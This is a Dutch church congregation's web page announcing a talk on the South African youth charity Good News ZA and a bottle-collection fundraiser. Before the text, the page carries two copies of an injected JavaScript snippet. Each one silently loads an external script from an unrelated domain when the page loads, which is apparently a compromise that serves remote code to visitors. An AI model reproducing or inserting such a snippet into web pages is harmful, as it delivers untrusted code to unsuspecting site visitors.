;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Theo de Jong vertelt over het collectproject 'Good News ZA' ... neem vooral ook je ouders mee ! - PKN Damwâld

Theo de Jong vertelt over het collectproject ‘Good News ZA’ … neem vooral ook je ouders mee !

Gepubliceerd op: vrijdag 12 januari 2018

Komende 23 januari zal Theo de Jong van Good News ZA in ’t Skûlplak een flitsende presentatie houden over hun project in Zuid Afrika voor alle jongeren van YOUTH@HOME, LIVESTEADY , SNUFFELKRING… en verdere geïnteresseerden. Aanvang is om 19.30 uur. En … neem vooral je ouders mee !

Ook starten de KINGKIDS in het kader van dit project met een ‘flesseninzamelingactie’. We willen vanaf volgende week tot het einde van het Kingkids seizoen lege flessen inzamelen! We willen jullie vragen de kids hierin te betrekken door ook pake/beppe, oom/tante, vrienden, buren etc. te vragen. De flessen kunnen iedere zondag tijdens Kingkids (09.15 uur -10.45 in ’t Skûlplak) worden ingeleverd, dus neem ze mee! Zo kunnen we met z’n allen hopelijk een leuk bedrag ophalen!

Zoals bekend wordt er weer bij alle jeugdactiviteiten gecollecteerd voor een bijzonder project. Het collectproject is dit seizoen  ‘Good News ZA’, waar met motivatie en passie aan de toekomst van de kinderen en jeugd wordt gebouwd in de plattelandsgebieden rondom Knysna, Zuid-Afrika.
Good News ZA is opgericht in januari 2014 door Theo en Jinke de Jong. In december 2011 hebben ze het Friese platteland verlaten en zich als gezin gevestigd in Knysna, Zuid-Afrika. Theo heeft zijn baan als supermarktmanager in De Westereen opgegeven zodat zij zich in konden gaan zetten voor de arme bevolking in de sloppenwijken van Knysna. Na twee jaar bij een andere organisatie gewerkt te hebben heeft God hen duidelijk gemaakt dat zij fulltime kinder- en jeugdwerk moesten gaan doen.

Theo en Jinke waren in 2013 al werkzaam op de Primary School (lagere school) in Knysna waar Theo op vrijdagochtend Bijbelonderwijs gaf. Verder begeleiden ze samen met een team de jeugd van de High School van Knysna op dinsdagochtenden. Beide werkzaamheden zijn na de start van Good News ZA doorgegaan. Dit is ook het geval met het kinderwerk in The Rock Christian Church Knysna waar Theo en Jinke de bovenbouw les geven. Sinds januari 2014 is hier het interkerkelijk jeugdwerk bijgekomen onder de vlag van The Rock Church. Gedurende het jaar 2014 werd steeds meer duidelijk dat Good News ZA zich moet gaan toeleggen op het begeleiden van kinderen en jeugd uit de “rural Areas” van Knysna. Dit zijn de plattelandsgebieden rondom Knysna.  In februari 2014 zijn Theo en Jinke voorgesteld aan het dorp Karatara tijdens een kerkdienst van de gezamenlijke kerken. Vanaf februari is er door middel van een Kids Party begonnen met de aftrap van het kinderwerk in Karatara, een dorp zo’n 40 kilometer van Knysna. Vanaf april 2014 is Good News ZA iedere maandagochtend werkzaam op de “Karatara Laërskool”. Dit is de lagere school van dit dorp. In het vierde kwartaal van 2014 is dit werk uitgebreid naar de Lagere School in Barrington, een dorpje zo’n 8 kilometer van Karatara.

Eén van hun plannen om de kinderen en jeugd te begeleiden naar een hoopvolle toekomst is het bouwen van een Kinder- en JeugdCentrum (hierna KJC genoemd) in Karatara. Ze willen door middel van dit KJC de kinderen en jeugd een veilige plek bieden om te bij elkaar te komen, games te doen en waar ze terecht kunnen met hun verhalen, vragen en moeilijkheden. Een ander plan is om een Camp Site te bouwen. Dit is een soort kampeerboerderij waardoor zij de kinderen en jeugd uit de wijde omgeving zo nu en dan een weekend of een week uit hun omgeving kunnen halen om hen te begeleiden en onderwijzen om hen de voor de toekomst de juiste keuzes te laten maken.